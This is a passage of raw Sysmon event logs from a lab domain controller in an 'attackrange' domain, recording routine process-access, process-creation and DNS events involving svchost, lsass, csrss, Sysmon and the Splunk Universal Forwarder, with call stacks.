10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.632{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.048{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.095{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:28.095{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.095{59A5CD1D-8E63-6005-7600-00000000A301}31723164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:29.704{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 